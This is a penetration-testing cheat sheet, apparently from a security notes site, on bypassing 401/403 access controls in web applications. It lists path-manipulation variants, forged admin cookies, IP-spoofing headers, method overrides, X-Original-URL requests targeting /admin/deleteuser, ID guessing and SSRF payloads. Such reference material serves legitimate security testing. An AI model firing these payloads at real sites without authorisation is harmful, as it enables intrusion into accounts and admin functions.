icon

Broken Access Control

Last modified: 2024-03-17

The attacking methodology of broken access control in web applications. If we got 401 or 403 HTTP response, try to bypass it using the following methods in this post.

Manipulate Path

/admin
/Admin
/ADMIN

/./admin
/.;/admin
/;/admin
/admin/
/admin/.

/admin%0d
/admin%0a
/admin%0d%0a

# Add a tab (or multiple tabs) after the path, not escape characters (`\t`).
# It's recommended to use BurpSuite Proxy.
/admin		HTTP/1.1

Change Header Values

We may be able to get access to the login-required pages.

Cookie: admin=true
Cookie: isAdmin=true
Cookie: access=1
Cookie: access=true
# Insert another user value
Cookie: session=<another_user_value>
Cookie: access_token=<another_user_value>

IP Spoofing

Cluster-Client-IP: 127.0.0.1
Forwarded-For: 127.0.0.1
X-Forwarded: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Original-URL: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-ProxyUser-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1

Host: 127.0.0.1

User Agent

Sometimes we can access another server by replacing the User Agent with the specific one.

User-Agent: <custom_user_agent>

Change Methods

GET, POST, PUT, DELETE, HEAD, TRACE, OPTIONS, PATCH, INVENTED, CONNECT, etc.

# Override to bypass FireWall (via POST /example HTTP/1.1)
X-Method-Override: PUT
X-HTTP-Method-Override: PUT

POST Parameters

POST / HTTP/1.1
...

{
    "email": "new-email@example.com",
    "isAdmin": true
}

X-Original-URL, X-Rewrite-URL

POST / HTTP/1.1

...
X-Original-URL: /admin/deleteuser
# or
X-Rewrite-URL: /admin/deleteuser
...

username=michael

GET Parameters

https://vulnerable.com/account?id=michael
https://vulnerable.com/account?id=admin
https://vulnerable.com/account?id=administrator

# GUID cannot be guessed but it may be found somewhere in the website.
https://vulnerable.com/account?id=7230b2a9-60de-4409-a350-cd14986a8d3e
https://vulnerable.com/account?id=1de655cb-29d7-4008-b434-e688b39f9564

Access Page via SSRF

If there is another website that is owned by same orginazation, we may be able to see the target website with SSRF.

https://example.com?url=https://admin.example.com/